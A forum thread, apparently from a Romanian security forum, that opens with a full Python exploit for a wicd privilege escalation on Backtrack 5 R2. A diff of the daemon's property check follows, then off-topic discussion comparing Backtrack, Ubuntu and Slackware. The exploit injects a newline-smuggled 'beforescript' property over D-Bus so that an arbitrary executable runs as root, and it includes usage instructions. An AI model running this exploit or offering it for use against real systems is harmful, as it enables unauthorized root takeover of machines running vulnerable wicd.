Jump to content
Guest expl0iter

Backtrack 5 R2 wicd Privilege Escalation

Recommended Posts

Guest expl0iter
Posted
#!/usr/bin/python
#wicd 0day exploit discovered on 4.9.12 by InfoSec Institute student
#For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
import sys
import os
import time
import getopt

try: from wicd import dbusmanager
except: print "[!] WICD Error: libraries are not available. Is WICD installed?"; sys.exit(0)

class Error(Exception):
def __init__(self, error):
self.errorStr=error

def __str__(self):
return repr(self.errorStr)


class Wicd():
wireless=None
daemon=None
versionString=None
def __init__(self):
try:
dbusmanager.connect_to_dbus()
dbusInterfaces = dbusmanager.get_dbus_ifaces()
self.wireless = dbusInterfaces["wireless"]
self.daemon = dbusInterfaces["daemon"]
except:
raise Error("Daemon is not running")
self.versionString = self.daemon.Hello()

def versionLessThan(self, version):
if int(self.versionString.replace(".",""))<=version:
return True
else:
return False


class Exploit():

def __init__(self, wicd, scriptPath):
self.wicd = wicd
self.scriptPath = scriptPath

def getNets(self):
self.wicd.wireless.Scan(True)
nets = self.wicd.wireless.GetNumberOfNetworks()
while nets < 1:
self.wicd.wireless.Scan(True)
nets = self.wicd.wireless.GetNumberOfNetworks()
for net in range(nets):
yield net

def exploit(self):

for net in self.getNets(): pass # Priming scan.

try:
self.wicd.wireless.SetWirelessProperty(0, "beforescript = "+ self.scriptPath +"\nrooted", "true")
except:
raise Error("Unable to exploit (SetWirelessProperty() failed.)")

try:
self.wicd.wireless.SaveWirelessNetworkProperty(0, "beforescript = "+ self.scriptPath +"\nrooted")
except:
raise Error("Unable to exploit (SetWirelessProperty() failed.)")

propertyKey = 'bssid' # Could be essid, or any other identifiable wireless property
vulnIdentifier = self.wicd.wireless.GetWirelessProperty(0, propertyKey)

# TODO: Does this need a try construct?
self.wicd.wireless.ReloadConfig()

for net in self.getNets(): # Implicit, but required re-scan.
if self.wicd.wireless.GetWirelessProperty(net, propertyKey) == vulnIdentifier:
self.wicd.wireless.ConnectWireless(net)
return True
raise Error("Unable to exploit (Lost the network we were using)")


def usage():
print "[!] Usage:"
print " ( -h, --help ):"
print " Print this message."
print " ( --scriptPath= ): Required, executable to run as root."
print " --scriptPath=/some/path/to/executable.sh"

def main():
print "[$] WICD =< 1.7.0Day"
try:
opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "scriptPath="])
except getopt.GetoptError, err:
# Print help information and exit:
print '[!] Parameter error:' + str(err) # Will print something like "option -a not recognized"
usage()
sys.exit(0)

scriptPath=None

for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit(0)
elif opt =="--scriptPath":
scriptPath=arg
else:
# I would be assuming to say we'll never get here.
print "[!] Parameter error."
usage()
sys.exit(0)

if not scriptPath:
print "[!] Parameter error: scriptPath not set."
usage()
sys.exit(0)

try:
wicd = Wicd()
except Error as error:
print "[!] WICD Error: %s" % (error.errorStr)
exit(0)
print "[*] WICD Connection Initialized! (Version: %s)" % (wicd.versionString)

if not wicd.versionLessThan(171):
print "[!] WICD Warning: version print exceeds 1.7.1: Trying anyhow."

exploit = Exploit(wicd, scriptPath)

print "[*] Attempting to exploit:"

try:
exploit.exploit()
except Error as error:
print "[!] Exploit Error: %s" % (error.errorStr)
exit(0)
print "[*] Exploit appears to have worked."

# Standard boilerplate to call the main() function to begin
# the program.
if __name__=='__main__':
main()




==========================================

PATCH:

- --- _wicd-daemon.py 2012-04-09 16:31:19.000000000 -0400
+++ wicd-daemon.py 2012-02-02 11:38:26.000000000 -0500
@@ -945,30 +945,6 @@
self._scanning = False
self.LastScan = []
self.config = ConfigManager(wireless_conf, debug=debug)
- -
- - #Using a dict to avoid repitition.
- - self._validProperties = {
- - 'bssid':None,
- - "essid":None,
- - "hidden":None,
- - "channel":None,
- - "mode":None,
- - "enctype":None,
- - "encryption_method":None,
- - "key":None,
- - "automatic":None,
- - "ip":None,
- - "netmask":None,
- - "broadcast":None,
- - "gateway":None,
- - "use_static_dns":None,
- - "use_global_dns":None,
- - "dns1":None,
- - "dns2":None,
- - "dns3":None,
- - "use_settings_globally":None,
- - "has_profile":None
- -}

def get_debug_mode(self):
return self._debug_mode
@@ -1088,7 +1064,7 @@
def SetWirelessProperty(self, netid, prop, value):
""" Sets property to value in network specified. """
# We don't write script settings here.
- - if (prop.strip() not in self._validProperties):
+ if (prop.strip()).endswith("script"):
print "Setting script properties through the daemon is not" \
+ " permitted."
return False

Posted

Backtrack este destinat sa ruleze din LiveCD nefiind un sistem operativ stabil pentru a fi instalat.Exista diverse alte sisteme operative care pot fi folosite pentru acest scop.Problem solved.

Posted

Zice bine Muts ... Nu este de competenta echipei Backtrack sa faca/aplice un patch la un produs care nu este al lor ! Probabil exploitul pt Wicd este pentru toate distributiile dar a fost scos in fata doar pt ca este default in Backtrack !

@pyth0n3: Functioneaza destul de bine ca si OS instalat ... Eu nu am avut probleme pana acum cu el si in afara de stabilitatea conectiunii la wifi (wep/wpa) eu nu am avut nici cea ai mica problema cu el !

Posted (edited)

@pyth0n3: Functioneaza destul de bine ca si OS instalat ... Eu nu am avut probleme pana acum cu el si in afara de stabilitatea conectiunii la wifi (wep/wpa) eu nu am avut nici cea ai mica problema cu el !

Nu am zis ca nu functioneaza dar nu e ceea ce pare sau cel putin de cand nu mai e Slackware ,

Backtrack == Ubuntu , vine numit backtrack doar pentru un suite de tool-uri pe care le-au pus deasupra

Au trecut de la Slackware la Ubuntu deoarece nu ar fi avut un mare success avand in vedere faptul ca multi nu ar fi fost in grad sa instaleze un Slackware in schimb ubuntu e foarte usor de instalat si oricare poate avea backtrack (asa creste numele),Avand in vedere faptul ca nu e facut ca sa fie folosit ca un sistem de baza e ok , atata timp cat il folosesti din LiveCD .Evident se poate instala dar nu e definit ca un sistem de baza .As fi preferat slackware , de aceea eu nu folosesc backtrack (Asta e parerea mea)

Edited by pyth0n3
Posted

pyth0n3 linux, ubuntu este cel mai bun, si nu te uita dupa nume, de back track 5.r2 sau precum e fedora sau mandrila, si asa mai departe,ca e vorba de reclama, folositi ubuntu, e si mai bun ca back track, ceea ce ai in back track poti pune in ubuntu.in plus back track, nu numai live cd, si instalat bine facuta bine partitia, dupa aia ruleaza bine, dar eu tot raman cu ubuntu.

Posted (edited)

@vladimir: Vorbesti aiurea ... Backtrack este 95% Ubuntu si "vine numit backtrack doar pentru suitele de tool-uri instalate " dupa cum a precizat Pythone ! BTW se numeste Mandriva ... Si nu poti spune ca Ubuntu este cea mai buna distributie doar pentru ca iti place tie sau ca toti copii pot da clickuri si cred ei ca stiu linux !Intradevar Ubuntu are parte de cel mai bun suport la ora actuala dar daca ai probleme in loc sa incerci sa le rezolvi fugi repede la nenea gogu si dai copy/paste de pe forumuri !! Cea mai buna distributie este cea cu care lucrezi tu personal cel mai bine .. Si asta o sa iti spuna orice sysadmin cat de cat competent !

@pythone: sunt sigur ca cei care folosesc Backtrack exact pentru ceea ce a fost creat stiu/"sunt in stare" sa instaleze Slackware ... Cel mai probabil alegerea lor a fost facuta pentru popularitatea distributiei si pentru ca 99% din persoanele care stiu sa lucreze in astfel de medii se simt cat de cat confortabil cu Ubuntu !

Edited by co4ie
Posted (edited)
pyth0n3 linux, ubuntu este cel mai bun, si nu te uita dupa nume,

Singurele distro Linux despre care putem vorbi si pune in confrunt intre ele sunt: Debian,RedHat,Slackware,Suse, restul sunt doar derivate , Ubuntu e un derivat si nu il voi pune in confrunt cu nici una din distributiile de mai sus.

Eu cand voi vorbi de Linux ma voi referi doar la 4 distributii iar cand ma voi referi la derivate voi specifica cine este tatal.

@pythone: sunt sigur ca cei care folosesc Backtrack exact pentru ceea ce a fost creat stiu/"sunt in stare" sa instaleze Slackware ...

In privinta asta nu am nici un dubiu, ma refeream la final users.Sunt mai multi fani Ubuntu si e mai usor de aceea au ales ca suit-ul de tool-uri sa fie in ubuntu.Eu as fi preferat sa ramana o distributie pura ca Slackware .(Asta e doar una din parerile mele)Ei au facut ceea ce au crezut mai bine pentru final users.

Oricum e destinat pentru pentesting LiveCD dar poate fi si instalat evident.

Edited by pyth0n3
Posted

Interesanta descoperire. Pt cei care stiu cu ce se manaca backtrack : cum te conectezi la un backtrack prin retea cand sigurul serviciu este postgresql cu bind 127.0.0.1 ?

Cat despre disctutia offtopic de mai sus: Ce conteaza pe ce OS au pus utilitarele ? Probabil ca au ales uBuntu tocmai pt ca kernelul e compilat cu full support pentru cam tot ce misca networking/video/sound .

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...